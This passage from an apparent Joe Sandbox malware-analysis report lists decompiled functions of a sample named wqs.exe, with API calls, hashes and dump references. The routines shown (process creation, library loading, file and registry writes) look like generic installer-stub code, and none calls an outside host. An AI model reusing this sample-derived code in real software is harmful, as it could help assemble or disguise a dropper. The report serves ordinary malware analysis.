MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: fa234a311d5315365d19d83b79d92e578c8214a2500263e11cb90b957d52e03b
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405b29
0x00405b49
0x00405b51
0x00405b56
0x00000000
0x00405b5c
0x00405b60

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
CloseHandle.KERNEL32(?), ref: 00405B56

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x433ed0; // 0x10440
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x433ee4; // 0x10438
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402c2d
0x00402c39

APIs

ShowWindow.USER32(00010440,?), ref: 00401587
ShowWindow.USER32(00010438), ref: 0040159C

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
Instruction ID: a156d7c756385a3c588793d51facb92f34767ed8181f20582b2048d309791e4b
Opcode Fuzzy Hash: 830d7a4ba9a8f24a7d9b261e52e8913face7f91c13cb0f59137def6ec9c3a180
Instruction Fuzzy Hash: 25E04F76B101149BCB05DFA8ED908AEB3A6EB84311314483BE502B3290D675AD048B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 6C772B98 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E6C772B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x6c775050 != 0 && E6C772ADB(_a4) == 0) {
					 *0x6c775054 = _t93;
					if( *0x6c77504c != 0) {
						_t93 =  *0x6c77504c;
					} else {
						E6C7730C0(E6C772AD5(), __ecx);
						 *0x6c77504c = _t93;
					}
				}
				_t28 = E6C772B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6C772AFD();
					_t72 = _a4;
					_t79 =  *0x6c775058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x6c775058 = _t72;
					E6C772AF7();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x6c775034 = _t33;
					 *0x6c775038 = _t79;
					if( *0x6c775050 != 0 && E6C772ADB( *0x6c775058) == 0) {
						 *0x6c77504c = _t94;
						_t94 =  *0x6c775054;
					}
					_t80 =  *0x6c775058;
					_a4 = _t80;
					 *0x6c775058 =  *((intOrPtr*)(E6C772AFD() + _t80));
					_t37 = E6C772AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E6C772B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6C772B14() + _a4 + _v8);
							_push(E6C772B1E());
							if( *0x6c775050 <= 0 || E6C772ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x6c77504c =  *0x6c77504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x6c775058;
					if( *0x6c775058 == 0) {
						 *0x6c77504c = 0;
					}
					E6C772B42(_t107, _a4,  *0x6c775034,  *0x6c775038);
					return _a4;
				}
				_push(E6C772B14() + _a4);
				_t56 = E6C772B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E6C772B26();
				_t87 = E6C772B22();
				_t90 = E6C772B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6c772ba8
0x6c772bb9
0x6c772bc6
0x6c772bda
0x6c772bc8
0x6c772bcd
0x6c772bd2
0x6c772bd2
0x6c772bc6
0x6c772be3
0x6c772be8
0x6c772bee
0x6c772c32
0x6c772c32
0x6c772c37
0x6c772c3c
0x6c772c42
0x6c772c44
0x6c772c4a
0x6c772c57
0x6c772c59
0x6c772c5e
0x6c772c6b
0x6c772c7e
0x6c772c84
0x6c772c8a
0x6c772c8b
0x6c772c91
0x6c772c9d
0x6c772ca3
0x6c772cab
0x6c772cac
0x6c772caf
0x6c772cba
0x6c772cbc
0x6c772cc8
0x6c772cce
0x6c772cd6
0x6c772d02
0x6c772d03
0x6c772d05
0x6c772d09
0x6c772d09
0x6c772d10
0x6c772ce6
0x6c772ce6
0x6c772ce7
0x6c772cf5
0x6c772cfe
0x6c772cfe
0x6c772cd6
0x6c772cba
0x6c772d12
0x6c772d19
0x6c772d1b
0x6c772d1b
0x6c772d34
0x6c772d42
0x6c772d42
0x6c772bf9
0x6c772bfa
0x6c772bff
0x6c772c03
0x6c772c08
0x6c772c1c
0x6c772c1d
0x6c772c1e
0x6c772c20
0x6c772c25
0x6c772c27
0x6c772c27
0x6c772c2a
0x6c772c30
0x00000000

APIs

ReadFile.KERNELBASE(00000000), ref: 6C772C57

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 06781fbae7688c13d823eeee70a338e72243b3d2106a9cf924a97f93ed5f8ae4
Instruction ID: cbee328fd719a0a75385040501e69e128ff09c96d78373e16db78ee5de027f25
Opcode Fuzzy Hash: 06781fbae7688c13d823eeee70a338e72243b3d2106a9cf924a97f93ed5f8ae4
Instruction Fuzzy Hash: 1F414E71A0421DEBDF329F64EB4DB9937B4FB46318F208839E815C6A10E7349585DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063e2
0x004063eb
0x00406401
0x00000000
0x00406401
0x004063ef
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
